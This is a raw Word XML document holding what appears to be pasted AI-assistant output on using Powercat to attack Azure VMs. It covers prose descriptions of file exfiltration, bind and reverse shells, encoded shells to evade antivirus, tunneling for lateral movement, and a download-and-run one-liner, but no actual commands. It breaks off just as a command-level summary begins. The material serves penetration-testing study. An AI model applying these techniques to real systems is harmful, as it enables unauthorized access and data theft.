    <w:p w14:paraId="41A9B741" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Streams file contents over a TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E81F7E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Exfiltrate sensitive files (e.g., config files, keys) or upload malicious payloads/scripts to Azure VMs after gaining initial access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320CE750" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Bind Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3412A6EE" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Create a listener shell on the target VM that the attacker connects to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9ABB26" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> The victim Azure VM runs Powercat to listen on a port, spawning an interactive shell for remote commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0A6D9C" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Exploits Azure VM remote code execution vulnerabilities or misconfigurations to open a bind shell, allowing persistent attacker access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041BB41F" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9B073" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Victim VM initiates a connection to the attacker’s listener, giving the attacker command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53058A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> The attacker sets up a listener; the compromised Azure VM connects back, bypassing inbound firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B087033" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Particularly useful to bypass Azure Network Security Group (NSG) restrictions, as outbound traffic is often less restricted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5321D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Standalone and Encoded Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2120575B" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Deploy PowerShell scripts on Azure VMs to spawn shells, evade antivirus via encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C40936" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Scripts are pre-written and executed on the VM (e.g., via scheduled tasks, run commands).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA23D93" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Useful when direct command execution is limited; encoded shells evade detection on Azure VMs protected by endpoint protection tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A210C0B" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D7BB18" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Use a compromised Azure VM as a relay to access internal subnets or services not directly accessible externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F314AEE" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Powercat creates TCP traffic relays to forward ports (e.g., SSH or web servers) through an intermediate Azure VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011463AE" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Exploits multi-homed Azure VMs or pivot points inside virtual networks to reach protected resources behind NSGs or Azure Firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0640CE2D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. One-Liner Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F323E28" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Quickly deploy Powercat and spawn a reverse shell with minimal footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45877781" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Executes PowerShell commands to download and run Powercat from a web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79006AE6" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Ideal for initial exploitation phases when limited command execution is available on Azure VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2011EDFF" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="522AEBBD">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE40D9A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Vulnerabilities and Services Targeted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAAF1A" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Virtual Machines (VMs):</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Main target for shell access and lateral movement. Misconfigured NSGs, weak credentials, or exposed management ports allow attackers to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C507C" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Azure Network Security Groups (NSGs):</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Improper rules may permit inbound or outbound traffic that facilitates Powercat communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B88F4C" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Virtual Networks (VNets):</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Internal subnet pivoting and lateral movement via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> rely on network segmentation gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485E1FD0" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Automation / Scheduled Tasks:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Allows running standalone PowerShell scripts, enabling persistence or delayed execution of reverse shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF75A28" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Files / Blob Storage (Indirectly):</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Could be used for staging payloads or exfiltrated data during file transfer operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754AAA70" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="53A293D1">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7978D5" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation Workflow in Azure Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D5DD1" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reconnaissance:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Use Powercat port scanning to identify open services on Azure VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A4FDFB" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Exploit exposed ports or vulnerabilities to run PowerShell commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0651E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Transfer:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Upload Powercat scripts or payloads to the target VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E240F0E" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shell Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Use bind or reverse shells to get interactive command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78628026" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence and Evasion:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Use encoded shells or standalone scripts to evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB1994" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pivot and Lateral Movement:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Establish tunnels to access internal subnets or protected Azure resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717132A2" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Exfiltration or Further Exploitation:</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> Transfer sensitive data or move laterally within the Azure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB05209" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="1F0D90D2">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47ED5F" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6A4800" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">Powercat is a versatile tool in Azure penetration testing that leverages typical Azure cloud attack surfaces—such as exposed VM ports, weak NSG configurations, and PowerShell execution capabilities—to gain and maintain unauthorized access. Attackers exploit Azure VM vulnerabilities and network misconfigurations using Powercat’s features for reconnaissance, command execution, file transfer, and network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>tunneling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:t>, which underscores the need for strict NSG rules, endpoint protection, PowerShell execution policies, and network segmentation in Azure security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375916D2" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="66797E3C">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD42A3" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">If you want, I can help you craft a </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>detailed technical summary with remediation recommendations</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> or a </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">formal external </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> report section</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> based on this! Would you like that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587D259" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRDefault="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20088EFA" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRDefault="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6503E1" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRDefault="008F3C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7353AC" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">Got it! You want a </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>summary that links specific Powercat commands to actual Azure vulnerabilities and explains exactly how those commands exploit those weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295DE1C6" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve">Here’s a </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clear, command-focused summary</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t xml:space="preserve"> showing </w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>which Azure vulnerabilities/services are targeted and how Powercat commands are used to exploit them</w:t>
      </w:r>
      <w:r w:rsidRPr="008F3C46">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AB3F2D" w14:textId="77777777" w:rsidR="008F3C46" w:rsidRPr="008F3C46" w:rsidRDefault="008F3C46" w:rsidP="008F3C46">
      <w:r w:rsidRPr="008F3C46">
        <w:pict w14:anchorId="2A48E2F9">
          <v:rect id="_x0000_i1169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
